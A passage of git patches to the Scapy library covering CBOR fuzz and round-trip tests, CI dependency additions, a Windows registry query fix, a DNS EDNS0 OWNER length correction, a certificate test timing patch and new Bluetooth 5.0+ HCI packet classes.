CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and remainder == b'' + ++ CBOR Fuzzing Stress Tests + += Generate 100 random objects without errors +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +objects = [] +for _ in range(100): + obj = None + try: + obj = rand._fix() + except: + pass + if obj is not None: + objects.append(obj) + +len(objects) >= 95 + += Encode 50 random objects without errors +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +encoded_count = 0 +for _ in range(50): + obj = rand._fix() + try: + encoded = bytes(obj) + if len(encoded) > 0: + encoded_count += 1 + except: + pass + +encoded_count >= 45 + += Roundtrip 50 random objects +from scapy.cbor import RandCBORObject, CBOR_Codecs +rand = RandCBORObject() +roundtrip_count = 0 +for _ in range(50): + obj = rand._fix() + try: + encoded = bytes(obj) + decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) + if remainder == b'': + roundtrip_count += 1 + except: + pass + +roundtrip_count >= 45 diff --git a/tox.ini b/tox.ini index a013a8b9807..442ba9fdab1 100644 --- a/tox.ini +++ b/tox.ini @@ -33,6 +33,7 @@ deps = cryptography coverage[toml] python-can + cbor2 scapy-rpc # disabled on windows because they require c++ dependencies # brotli 1.1.0 broken https://github.com/google/brotli/issues/1072 From b1add1f796b4f28f0ff29d6b81480a9cd0ac8b85 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 19 Mar 2026 13:54:58 +0300 Subject: [PATCH 1615/1632] ci: install cbor2 on Packit (#4948) to prevent the newly introduced CBOR tests from failing with: ``` ###(090)=[failed] Interop: Large unsigned integer >>> large_int = 18446744073709551615 # 2^64 - 1 >>> encoded = cbor2.dumps(large_int) NameError: name 'cbor2' is not defined ``` and so on. --- .packit.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.packit.yml b/.packit.yml index fa7bda9855b..ac6da5c6283 100644 --- a/.packit.yml +++ b/.packit.yml @@ -28,6 +28,7 @@ actions: - "sed -i '/^BuildArch/aBuildRequires: python3-ipython' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-brotli' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-can' .packit_rpm/scapy.spec" + - "sed -i '/^BuildArch/aBuildRequires: python3-cbor2' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-coverage' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-cryptography' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-tkinter' .packit_rpm/scapy.spec" From 04b99c3c69572b579526bc6861ecdc1f6ab5f265 Mon Sep 17 00:00:00 2001 From: Ebrix <8287617+Ebrix@users.noreply.github.com> Date: Mon, 23 Mar 2026 18:50:52 +0100 Subject: [PATCH 1616/1632] [MS-RRP] Registry: Fix lpClassOut name request (#4953) --- scapy/layers/windows/registry.py | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/scapy/layers/windows/registry.py b/scapy/layers/windows/registry.py index 640f09829cd..198806b75c6 100644 --- a/scapy/layers/windows/registry.py +++ b/scapy/layers/windows/registry.py @@ -493,6 +493,26 @@ def get_key_info( timeout=timeout, ) + if response.status != 0: + log_runtime.error( + "Got status %s while querying key info", hex(response.status) + ) + raise ValueError(response.status) + + if response.lpClassOut.Length > 2: + # There is a Class info stored. We need to + # get it by specifying the proper MaximumLength. + # By default the size is "2". + response = self.sr1_req( + BaseRegQueryInfoKey_Request( + hKey=key_handle, + lpClassIn=RPC_UNICODE_STRING( + MaximumLength=response.lpClassOut.Length + ), + ), + timeout=timeout, + ) + if response.status != 0: log_runtime.error( "Got status %s while querying key info", hex(response.status) @@ -588,7 +608,6 @@ def enum_subkeys( index += 1 results.append(response.lpNameOut.valueof("Buffer")[:-1].decode()) - return results def enum_values( From 2b220b9e797256911e082aae07ba8be940607447 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 29 Mar 2026 10:55:28 +0300 Subject: [PATCH 1617/1632] dns: fix off-by-four in EDNS0 OWNER Option (#4955) The lengths taken from https://datatracker.ietf.org/doc/html/draft-cheshire-edns0-owner-option-01 are off by four because they include the length of the two-byte EDNS0 option code and the length of the two-byte EDNS0 option length but according to https://datatracker.ietf.org/doc/html/rfc6891#section-6.1.2 the length should include the size of data only so all the lengths should be decreased by 4 to parse the OWNER option containing the wakeup MAC correctly. Without this patch the wakeup MAC gets cut off: ``` >>> EDNS0OWN(b'\x00\x04\x00\x0e\x00\x9b\x11"3DUffUD3"\x11') > ``` With this patch it's included as expected ``` ``` --- scapy/layers/dns.py | 6 +++--- test/scapy/layers/dns_edns0.uts | 29 +++++++++++++++++++++++++++++ 2 files changed, 32 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 3177ee38186..a45044c5532 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -494,11 +494,11 @@ class EDNS0OWN(_EDNS0Dummy): MACField("primary_mac", "00:00:00:00:00:00"), ConditionalField( MACField("wakeup_mac", "00:00:00:00:00:00"), - lambda pkt: (pkt.optlen or 0) >= 18), + lambda pkt: (pkt.optlen or 0) >= 14), ConditionalField( StrLenField("password", "", - length_from=lambda pkt: pkt.optlen - 18), - lambda pkt: (pkt.optlen or 0) >= 22)] + length_from=lambda pkt: pkt.optlen - 14), + lambda pkt: (pkt.optlen or 0) >= 18)] def post_build(self, pkt, pay): pkt += pay diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index b8b1202f8bf..add646d3338 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -212,3 +212,32 @@ for opt_class in EDNS0OPT_DISPATCHER.values(): p = DNSRROPT(raw(DNSRROPT(rdata=[EDNS0TLV(), opt_class(), opt_class()]))) assert len(p.rdata) == 3 assert all(Raw not in opt for opt in p.rdata) + + ++ EDNS0 - Owner + += Dissection + +p = EDNS0OWN(b'\x00\x04\x00\x08\x00\x9b\x11"3DUf') +assert p.optcode == 4 +assert p.optlen == 8 +assert p.v == 0 +assert p.s == 155 +assert p.primary_mac == '11:22:33:44:55:66' + +p = EDNS0OWN(b'\x00\x04\x00\x0e\x00\x9b\x11"3DUffUD3"\x11') +assert p.optcode == 4 +assert p.optlen == 14 +assert p.v == 0 +assert p.s == 155 +assert p.primary_mac == '11:22:33:44:55:66' +assert p.wakeup_mac == '66:55:44:33:22:11' + +p = EDNS0OWN(b'\x00\x04\x00\x12\x00\x9b\x11"3DUffUD3"\x11abcd') +assert p.optcode == 4 +assert p.optlen == 18 +assert p.v == 0 +assert p.s == 155 +assert p.primary_mac == '11:22:33:44:55:66' +assert p.wakeup_mac == '66:55:44:33:22:11' +assert p.password == b'abcd' From f4a2ca43c19c0984117fc13b0946dc5451390a69 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 30 Mar 2026 12:24:24 +0300 Subject: [PATCH 1618/1632] tests: patch localtime in the "cert remainingdays" test (#4956) to make sure the code where the invalid timezone is passed to exercise the localtime code path doesn't fail as time goes by. The other test was added to exercise the code path where the second format is passed. --- test/scapy/layers/tls/cert.uts | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/test/scapy/layers/tls/cert.uts b/test/scapy/layers/tls/cert.uts index 35a8d050059..cb3b363397e 100644 --- a/test/scapy/layers/tls/cert.uts +++ b/test/scapy/layers/tls/cert.uts @@ -329,7 +329,13 @@ x.notAfter == (2026, 3, 30, 7, 38, 59, 0, 89, -1) = Cert class : test remainingDays assert abs(x.remainingDays("02/12/11")) > 5000 -assert abs(x.remainingDays("Feb 12 10:00:00 2011 Paris, Madrid")) > 1 +assert abs(x.remainingDays("Feb 12 10:00:00 2011 UTC")) > 5000 + +from unittest.mock import patch +import time + +with patch('time.localtime', return_value=time.struct_time((2026, 3, 1, 0, 0, 0, 6, 60, 0))): + assert abs(x.remainingDays("Feb 12 10:00:00 2011 Paris, Madrid")) > 1 = Cert class : Checking RSA public key assert type(x.pubkey) is PubKeyRSA @@ -1104,4 +1110,4 @@ assert [x.buffer for x in aikOpaque.policyDigestList.digests] == [ b'\xc4\x13\xa8G\xb1\x11\x12\xb1\xcb\xdd\xd4\xec\xa4\xda\xaa\x15\xa1\x85,\x1c;\xbaWF\x1d%v\x05\xf3\xd5\xafS', b'', b'\x04\x8e\x9a:\xce\x08X?y\xf3D\xffx[\xbe\xa9\xf0z\xc7\xfa3%\xb3\xd4\x9a!\xddQ\x94\xc6XP', -] \ No newline at end of file +] From 9ae49f850db81ae2023e667014cc0f1ed5aa7a35 Mon Sep 17 00:00:00 2001 From: sacca <26978820+sacca97@users.noreply.github.com> Date: Mon, 30 Mar 2026 21:46:38 +0200 Subject: [PATCH 1619/1632] More Bluetooth 5.0+ packets (#4905) * add some packets * some formatting * consistent address variables naming in layers/bluetooth.py * minor fixes * more fixing names * Fix HCI_Cmd_LE_Set_Extended_Scan_Parameters * more fixes * more fixes * more fixes * fix formatting * more tests * added deprecated_fields for backward compatibility * fix flake 8 errors --------- Co-authored-by: Tommaso Sacchetti --- scapy/layers/bluetooth.py | 329 +++++++++++++++++++++++++++++--- test/scapy/layers/bluetooth.uts | 123 +++++++++++- 2 files changed, 411 insertions(+), 41 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 0122559e5f0..2784a515e9f 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -58,6 +58,7 @@ LEMACField, BitEnumField, LEThreeBytesField, + ConditionalField ) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv @@ -929,8 +930,12 @@ class SM_Identity_Information(Packet): class SM_Identity_Address_Information(Packet): name = "Identity Address Information" - fields_desc = [ByteEnumField("atype", 0, {0: "public"}), - LEMACField("address", None), ] + fields_desc = [ByteEnumField("addr_type", 0, {0: "public"}), + LEMACField("addr", None), ] + deprecated_fields = { + "atype": ("addr_type", "2.7.0"), + "address": ("addr", "2.7.0"), + } class SM_Signing_Information(Packet): @@ -2045,6 +2050,11 @@ class HCI_Cmd_Write_Loopback_Mode(Packet): # 7.8 LE CONTROLLER COMMANDS, the OGF code is defined as 0x08 +class HCI_Cmd_LE_Set_Event_Mask(Packet): + name = 'HCI_LE_Set_Event_Mask' + fields_desc = [StrFixedLenField('mask', b'\xff\xff\xff\xff\xff\x1f\x00\x00', 8)] + + class HCI_Cmd_LE_Read_Buffer_Size_V1(Packet): name = "HCI_LE_Read_Buffer_Size [v1]" @@ -2059,19 +2069,74 @@ class HCI_Cmd_LE_Read_Local_Supported_Features(Packet): class HCI_Cmd_LE_Set_Random_Address(Packet): name = "HCI_LE_Set_Random_Address" - fields_desc = [LEMACField("address", None)] + fields_desc = [LEMACField("addr", None)] + deprecated_fields = {"address": ("addr", "2.7.0")} class HCI_Cmd_LE_Set_Advertising_Parameters(Packet): name = "HCI_LE_Set_Advertising_Parameters" fields_desc = [LEShortField("interval_min", 0x0800), LEShortField("interval_max", 0x0800), - ByteEnumField("adv_type", 0, {0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_SCAN_IND", 3: "ADV_NONCONN_IND", 4: "ADV_DIRECT_IND_LOW"}), # noqa: E501 - ByteEnumField("oatype", 0, {0: "public", 1: "random"}), - ByteEnumField("datype", 0, {0: "public", 1: "random"}), - LEMACField("daddr", None), + ByteEnumField("adv_type", 0, { + 0: "ADV_IND", + 1: "ADV_DIRECT_IND", + 2: "ADV_SCAN_IND", + 3: "ADV_NONCONN_IND", + 4: "ADV_DIRECT_IND_LOW"}), + ByteEnumField("own_addr_type", 0, { + 0: "public", + 1: "random"}), + ByteEnumField("peer_addr_type", 0, { + 0: "public", + 1: "random"}), + LEMACField("peer_addr", None), ByteField("channel_map", 7), - ByteEnumField("filter_policy", 0, {0: "all:all", 1: "connect:all scan:whitelist", 2: "connect:whitelist scan:all", 3: "all:whitelist"}), ] # noqa: E501 + ByteEnumField("filter_policy", 0, { + 0: "all:all", + 1: "connect:all scan:whitelist", + 2: "connect:whitelist scan:all", + 3: "all:whitelist"}), ] + deprecated_fields = { + "oatype": ("own_addr_type", "2.7.0"), + "datype": ("peer_addr_type", "2.7.0"), + "daddr": ("peer_addr", "2.7.0"), + } + + +class HCI_Cmd_LE_Set_Extended_Advertising_Parameters(Packet): + name = 'HCI_LE_Set_Extended_Advertising_Parameters' + fields_desc = [ByteField('handle', 0), + LEShortField('properties', 19), + LEThreeBytesField('pri_interval_min', 160), + LEThreeBytesField('pri_interval_max', 160), + ByteField('pri_channel_map', 7), + ByteEnumField('own_addr_type', 0, { + 0: 'public', + 1: 'random', + 2: 'rpa_pub', + 3: 'rpa_rand'}), + ByteEnumField('peer_addr_type', 0, { + 0: 'public', + 1: 'random', + 2: 'rpa_pub', + 3: 'rpa_rand'}), + LEMACField('peer_addr', None), + ByteEnumField("filter_policy", 0, { + 0: "all:all", + 1: "connect:all scan:whitelist", + 2: "connect:whitelist scan:all", + 3: "all:whitelist"}), + SignedByteField('tx_power', 127), + ByteEnumField('pri_phy', 1, {1: '1M', 3: 'Coded'}), + ByteField('sec_max_skip', 0), + ByteEnumField('sec_phy', 1, {1: '1M', 2: '2M', 3: 'Coded'}), + ByteField('sid', 0), + ByteField('scan_req_notify_enable', 0)] + + +class HCI_Cmd_LE_Set_Advertising_Set_Random_Address(Packet): + name = 'HCI_LE_Set_Advertising_Set_Random_Address' + fields_desc = [ByteField('handle', 0), LEMACField('addr', None)] class HCI_Cmd_LE_Set_Advertising_Data(Packet): @@ -2083,6 +2148,20 @@ class HCI_Cmd_LE_Set_Advertising_Data(Packet): align=31, padwith=b"\0"), ] +class HCI_Cmd_LE_Set_Extended_Advertising_Data(Packet): + name = 'HCI_LE_Set_Extended_Advertising_Data' + fields_desc = [ByteField('handle', 0), + ByteEnumField('operation', 3, { + 0: 'intermediate_frag', + 1: 'first_frag', + 2: 'last_frag', + 3: 'complete', + 4: 'unchanged_data'}), + ByteEnumField('frag_pref', 1, {0: 'allow_frag', 1: 'no_frag'}), + FieldLenField('len', None, length_of='data', fmt='B'), + PacketListField('data', [], EIR_Hdr, length_from=lambda pkt: pkt.len)] # noqa: E501 + + class HCI_Cmd_LE_Set_Scan_Response_Data(Packet): name = "HCI_LE_Set_Scan_Response_Data" fields_desc = [FieldLenField("len", None, length_of="data", fmt="B"), @@ -2094,16 +2173,69 @@ class HCI_Cmd_LE_Set_Advertise_Enable(Packet): fields_desc = [ByteField("enable", 0)] +class Extended_Advertise_Set(Packet): + name = 'Extended Advertising Set' + fields_desc = [ByteField('handle', 0), + LEShortField('duration', 0), + ByteField('max_events', 0)] + + +class HCI_Cmd_LE_Set_Extended_Advertise_Enable(Packet): + name = 'HCI_LE_Set_Extended_Advertising_Enable' + fields_desc = [ByteEnumField('enable', 1, {0: 'disable', 1: 'enable'}), + FieldLenField('num_sets', None, count_of='sets', fmt='B'), + PacketListField('sets', [], Extended_Advertise_Set, count_from=lambda pkt: pkt.num_sets)] # noqa: E501 + + class HCI_Cmd_LE_Set_Scan_Parameters(Packet): name = "HCI_LE_Set_Scan_Parameters" fields_desc = [ByteEnumField("type", 0, {0: "passive", 1: "active"}), XLEShortField("interval", 16), XLEShortField("window", 16), - ByteEnumField("atype", 0, {0: "public", - 1: "random", - 2: "rpa (pub)", - 3: "rpa (random)"}), + ByteEnumField("addr_type", 0, { + 0: "public", + 1: "random", + 2: "rpa (pub)", + 3: "rpa (random)"}), ByteEnumField("policy", 0, {0: "all", 1: "whitelist"})] + deprecated_fields = {"atype": ("addr_type", "2.7.0")} + + +class HCI_Cmd_LE_Set_Extended_Scan_Parameters(Packet): + name = 'HCI_LE_Set_Extended_Scan_Parameters' + fields_desc = [ + ByteEnumField('own_address_type', 0, { + 0: 'public', + 1: 'random', + 2: 'rpa_pub', + 3: 'rpa_rand'}), + ByteEnumField('scanning_filter_policy', 0, { + 0: 'basic', + 1: 'whitelist', + 2: 'basic_rpa', + 3: 'whitelist_rpa'}), + ByteField('scanning_phys', 1), + ConditionalField(ByteEnumField('scan_type_1m', 1, { + 0: 'passive', + 1: 'active'}), lambda pkt: pkt.scanning_phys & 1), + ConditionalField(LEShortField('scan_interval_1m', 16), + lambda pkt: pkt.scanning_phys & 1), + ConditionalField(LEShortField('scan_window_1m', 16), + lambda pkt: pkt.scanning_phys & 1), + ConditionalField(ByteEnumField('scan_type_2m', 1, { + 0: 'passive', + 1: 'active'}), lambda pkt: pkt.scanning_phys & 2), + ConditionalField(LEShortField('scan_interval_2m', 16), + lambda pkt: pkt.scanning_phys & 2), + ConditionalField(LEShortField('scan_window_2m', 16), + lambda pkt: pkt.scanning_phys & 2), + ConditionalField(ByteEnumField('scan_type_coded', 1, { + 0: 'passive', + 1: 'active'}), lambda pkt: pkt.scanning_phys & 4), + ConditionalField(LEShortField('scan_interval_coded', 16), + lambda pkt: pkt.scanning_phys & 4), + ConditionalField(LEShortField('scan_window_coded', 16), + lambda pkt: pkt.scanning_phys & 4)] class HCI_Cmd_LE_Set_Scan_Enable(Packet): @@ -2112,20 +2244,101 @@ class HCI_Cmd_LE_Set_Scan_Enable(Packet): ByteField("filter_dups", 1), ] +class HCI_Cmd_LE_Set_Extended_Scan_Enable(Packet): + name = 'HCI_LE_Set_Extended_Scan_Enable' + fields_desc = [ByteEnumField('enable', 1, {0: 'disabled', 1: 'enabled'}), + ByteEnumField('filter_dups', 1, { + 0: 'disabled', + 1: 'enabled', + 2: 'reset_period'}), + LEShortField('duration', 500), + LEShortField('period', 0)] + + class HCI_Cmd_LE_Create_Connection(Packet): name = "HCI_LE_Create_Connection" fields_desc = [LEShortField("interval", 96), LEShortField("window", 48), ByteEnumField("filter", 0, {0: "address"}), - ByteEnumField("patype", 0, {0: "public", 1: "random"}), - LEMACField("paddr", None), - ByteEnumField("atype", 0, {0: "public", 1: "random"}), + ByteEnumField("peer_addr_type", 0, {0: "public", 1: "random"}), + LEMACField("peer_addr", None), + ByteEnumField("own_addr_type", 0, {0: "public", 1: "random"}), LEShortField("min_interval", 40), LEShortField("max_interval", 56), LEShortField("latency", 0), LEShortField("timeout", 42), LEShortField("min_ce", 0), LEShortField("max_ce", 0), ] + deprecated_fields = { + "patype": ("peer_addr_type", "2.7.0"), + "paddr": ("peer_addr", "2.7.0"), + "atype": ("own_addr_type", "2.7.0"), + } + + +class HCI_Cmd_LE_Extended_Create_Connection(Packet): + name = 'HCI_LE_Extended_Create_Connection' + fields_desc = [ByteEnumField('filter_policy', 0, {0: 'peer_addr', 1: 'accept_list'}), # noqa: E501 + ByteEnumField('address_type', 0, { + 0: 'public', + 1: 'random', + 2: 'rpa_pub', + 3: 'rpa_rand'}), + ByteEnumField('peer_addr_type', 0, { + 0: 'public', + 1: 'random', + 2: 'rpa_pub', + 3: 'rpa_rand'}), + LEMACField('peer_addr', None), + ByteField('phys', 1), + ConditionalField(LEShortField('interval_1m', 96), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('window_1m', 96), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('min_interval_1m', 40), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('max_interval_1m', 56), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('latency_1m', 0), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('timeout_1m', 42), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('min_ce_1m', 0), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('max_ce_1m', 0), + lambda pkt: pkt.phys & 1), + ConditionalField(LEShortField('interval_2m', 96), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('window_2m', 96), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('min_interval_2m', 40), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('max_interval_2m', 56), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('latency_2m', 0), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('timeout_2m', 42), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('min_ce_2m', 0), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('max_ce_2m', 0), + lambda pkt: pkt.phys & 2), + ConditionalField(LEShortField('interval_coded', 96), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('window_coded', 96), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('min_interval_coded', 40), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('max_interval_coded', 56), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('latency_coded', 0), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('timeout_coded', 42), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('min_ce_coded', 0), + lambda pkt: pkt.phys & 4), + ConditionalField(LEShortField('max_ce_coded', 0), + lambda pkt: pkt.phys & 4)] class HCI_Cmd_LE_Create_Connection_Cancel(Packet): @@ -2142,10 +2355,10 @@ class HCI_Cmd_LE_Clear_Filter_Accept_List(Packet): class HCI_Cmd_LE_Add_Device_To_Filter_Accept_List(Packet): name = "HCI_LE_Add_Device_To_Filter_Accept_List" - fields_desc = [ByteEnumField("address_type", 0, {0: "public", + fields_desc = [ByteEnumField("addr_type", 0, {0: "public", 1: "random", 0xff: "anonymous"}), - LEMACField("address", None)] + LEMACField("addr", None)] class HCI_Cmd_LE_Remove_Device_From_Filter_Accept_List(HCI_Cmd_LE_Add_Device_To_Filter_Accept_List): # noqa: E501 @@ -2506,19 +2719,57 @@ class HCI_LE_Meta_Connection_Complete(Packet): fields_desc = [ByteEnumField("status", 0, {0: "success"}), LEShortField("handle", 0), ByteEnumField("role", 0, {0: "master"}), - ByteEnumField("patype", 0, {0: "public", 1: "random"}), - LEMACField("paddr", None), + ByteEnumField("peer_addr_type", 0, {0: "public", 1: "random"}), + LEMACField("peer_addr", None), LEShortField("interval", 54), LEShortField("latency", 0), LEShortField("supervision", 42), - XByteField("clock_latency", 5), ] + XByteField("master_clock_accuracy", 5)] + deprecated_fields = { + "patype": ("peer_addr_type", "2.7.0"), + "paddr": ("peer_addr", "2.7.0"), + "clock_latency": ("master_clock_accuracy", "2.7.0"), + } + + def answers(self, other): + if HCI_Cmd_LE_Create_Connection in other: + cmd = other[HCI_Cmd_LE_Create_Connection] + elif HCI_Cmd_LE_Extended_Create_Connection in other: + cmd = other[HCI_Cmd_LE_Extended_Create_Connection] + else: + return False + + return (cmd.peer_addr_type == self.peer_addr_type and + cmd.peer_addr == self.peer_addr) + + +class HCI_LE_Meta_Enhanced_Connection_Complete(Packet): + name = 'LE Enhanced Connection Complete' + fields_desc = [ByteEnumField('status', 0, {0: 'success'}), + LEShortField('handle', 0), + ByteEnumField('role', 0, {0: 'master', 1: 'slave'}), + ByteEnumField('peer_addr_type', 0, { + 0: 'public', + 1: 'random', + 2: 'public_identity', + 3: 'random_identity'}), + LEMACField('peer_addr', None), + LEMACField('local_rpa', None), + LEMACField('peer_rpa', None), + LEShortField('interval', 54), + LEShortField('latency', 0), + LEShortField('supervision', 42), + XByteField('master_clock_accuracy', 5)] def answers(self, other): - if HCI_Cmd_LE_Create_Connection not in other: + if HCI_Cmd_LE_Create_Connection in other: + cmd = other[HCI_Cmd_LE_Create_Connection] + elif HCI_Cmd_LE_Extended_Create_Connection in other: + cmd = other[HCI_Cmd_LE_Extended_Create_Connection] + else: return False - return (other[HCI_Cmd_LE_Create_Connection].patype == self.patype and - other[HCI_Cmd_LE_Create_Connection].paddr == self.paddr) + return cmd.peer_addr_type == self.peer_addr_type and cmd.peer_addr == self.peer_addr # noqa: E501 class HCI_LE_Meta_Connection_Update_Complete(Packet): @@ -2533,12 +2784,13 @@ class HCI_LE_Meta_Connection_Update_Complete(Packet): class HCI_LE_Meta_Advertising_Report(Packet): name = "Advertising Report" fields_desc = [ByteEnumField("type", 0, {0: "conn_und", 4: "scan_rsp"}), - ByteEnumField("atype", 0, {0: "public", 1: "random"}), + ByteEnumField("addr_type", 0, {0: "public", 1: "random"}), LEMACField("addr", None), FieldLenField("len", None, length_of="data", fmt="B"), PacketListField("data", [], EIR_Hdr, length_from=lambda pkt: pkt.len), SignedByteField("rssi", 0)] + deprecated_fields = {"atype": ("addr_type", "2.7.0")} def extract_padding(self, s): return '', s @@ -2575,14 +2827,14 @@ class HCI_LE_Meta_Extended_Advertising_Report(Packet): BitField("scannable", 0, 1), BitField("connectable", 0, 1), ByteField("reserved", 0), - ByteEnumField("address_type", 0, { + ByteEnumField("addr_type", 0, { 0x00: "public_device_address", 0x01: "random_device_address", 0x02: "public_identity_address", 0x03: "random_identity_address", 0xff: "anonymous" }), - LEMACField('address', None), + LEMACField('addr', None), ByteEnumField("primary_phy", 0, { 0x01: "le_1m", 0x03: "le_coded_s8", @@ -2598,17 +2850,23 @@ class HCI_LE_Meta_Extended_Advertising_Report(Packet): ByteField("tx_power", 0x7f), SignedByteField("rssi", 0x00), LEShortField("periodic_advertising_interval", 0x0000), - ByteEnumField("direct_address_type", 0, { + ByteEnumField("direct_addr_type", 0, { 0x00: "public_device_address", 0x01: "non_resolvable_private_address", 0x02: "resolvable_private_address_resolved_0", 0x03: "resolvable_private_address_resolved_1", 0xfe: "resolvable_private_address_unable_resolve"}), - LEMACField("direct_address", None), + LEMACField("direct_addr", None), FieldLenField("data_length", None, length_of="data", fmt="B"), PacketListField("data", [], EIR_Hdr, length_from=lambda pkt: pkt.data_length), ] + deprecated_fields = { + "address_type": ("addr_type", "2.7.0"), + "address": ("addr", "2.7.0"), + "direct_address_type": ("direct_addr_type", "2.7.0"), + "direct_address": ("direct_addr", "2.7.0"), + } def extract_padding(self, s): return '', s @@ -2699,18 +2957,26 @@ class HCI_LE_Meta_Extended_Advertising_Reports(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Loopback_Mode, ogf=0x06, ocf=0x0002) # 7.8 LE CONTROLLER COMMANDS, the OGF code is defined as 0x08 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Event_Mask, ogf=0x08, ocf=0x0001) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size_V1, ogf=0x08, ocf=0x0002) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size_V2, ogf=0x08, ocf=0x0060) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Local_Supported_Features, ogf=0x08, ocf=0x0003) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Random_Address, ogf=0x08, ocf=0x0005) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Parameters, ogf=0x08, ocf=0x0006) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Set_Random_Address, ogf=0x08, ocf=0x0035) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Extended_Advertising_Parameters, ogf=0x08, ocf=0x0036) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Data, ogf=0x08, ocf=0x0008) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Extended_Advertising_Data, ogf=0x08, ocf=0x0037) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Response_Data, ogf=0x08, ocf=0x0009) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertise_Enable, ogf=0x08, ocf=0x000a) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Extended_Advertise_Enable, ogf=0x08, ocf=0x0039) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Parameters, ogf=0x08, ocf=0x000b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Extended_Scan_Parameters, ogf=0x08, ocf=0x0041) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Enable, ogf=0x08, ocf=0x000c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Extended_Scan_Enable, ogf=0x08, ocf=0x0042) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection, ogf=0x08, ocf=0x000d) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Extended_Create_Connection, ogf=0x08, ocf=0x0043) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection_Cancel, ogf=0x08, ocf=0x000e) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Filter_Accept_List_Size, ogf=0x08, ocf=0x000f) @@ -2749,6 +3015,7 @@ class HCI_LE_Meta_Extended_Advertising_Reports(Packet): bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_LE_Read_White_List_Size, opcode=0x200f) # noqa: E501 bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Complete, event=0x01) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Enhanced_Connection_Complete, event=0x0a) bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Advertising_Reports, event=0x02) bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Update_Complete, event=0x03) bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Long_Term_Key_Request, event=0x05) @@ -2986,7 +3253,7 @@ def build_advertising_report(self): return HCI_LE_Meta_Advertising_Report( type=0, # Undirected - atype=1, # Random address + addr_type=1, # Random address data=self.build_eir() ) @@ -3156,8 +3423,8 